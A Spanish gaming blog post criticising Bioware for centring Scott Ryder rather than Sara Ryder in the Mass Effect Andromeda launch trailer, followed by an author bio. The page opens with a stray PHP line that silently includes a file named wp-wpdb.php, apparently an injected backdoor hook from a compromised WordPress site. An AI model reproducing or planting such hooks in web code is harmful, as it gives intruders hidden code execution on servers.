if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Bioware no se atrevió – La Fortaleza de LeChuck

Bioware no se atrevió

Anoche las redes sociales de Bioware anunciaban que hoy viernes veríamos el esperado tráiler de lanzamiento de Mass Effect Andromeda. En ese momento, muchos fans nos preguntábamos si Bioware daría el gran paso mostrando a Sara Ryder como protagonista de esta nueva aventura. Sin embargo, hace unas horas comprobábamos resignados como la compañía volvía a apostar por Scott.
Aún recuerdo la emoción que sintió la comunidad al ver el video de EA en el E3 con Sara apareciendo en los últimos minutos. En ese momento pensé «por fin utilizan al personaje femenino como protagonista». Parecía que se iniciaba un nuevo ciclo. Mucha gente celebraba que Bioware por fin lo iba a hacer. A medida que pasaron los meses, la figura de Sara se fue diluyendo y Scott tomaba las riendas de los tráilers más destacados. La última vez que vimos a Sara protagonizar un tráiler fue en el «Official Gameplay Trailer». Los dos tráilers cinematográficos fueron en exclusiva para su hermano.

Aún teníamos la esperanza de verla reaparecer en el tráiler de lanzamiento. Y aunque el fragmento que colgó Bioware en las redes no hacía presagiar nada bueno, queríamos creer. Era el turno de Sara. Su momento para hacer historia. Desgraciadamente, hace unas horas comprobábamos decepcionados como Sara solo aparecía 2 segundos, y en una situación lamentable. Para mas inri, Scott volvía en su papel de héroe ligón de la vieja escuela. La esperanza de cambio desapareció.

Bioware empezó bien dando a Sara la oportunidad de brillar y, a la vez, de romper con la arraigada tradición de utilizar al personaje masculino como protagonista, pero quizá la creencia de que el personaje femenino no funciona sigue aún vigente. Además, no hace falta irse muy lejos para comprobar que la mayoría de imágenes promocionales también cuentan con Scott.

Bioware, una compañía que presume de buscar la igualdad y visibilidad de los colectivos olvidados por la industria, no ha sido lo suficientemente valiente. Habrá que seguir esperando.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

1 comentario

Dejar un comentario